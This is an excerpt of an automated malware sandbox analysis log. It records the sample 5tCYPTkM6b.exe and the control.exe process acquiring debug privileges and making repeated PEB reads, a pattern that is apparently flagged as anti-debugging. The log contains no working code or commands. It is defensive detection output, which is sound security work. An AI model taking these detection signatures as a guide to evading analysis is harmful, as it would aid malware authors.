          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_021E0402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_021E0616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_021E0706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_021E0744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_021E06C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0442740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0435AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0437C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04377D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04428D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04393D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0438FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04408DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04382581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0436D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_044205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0441AE44 mov eax, dword ptr fs:[00000030h]
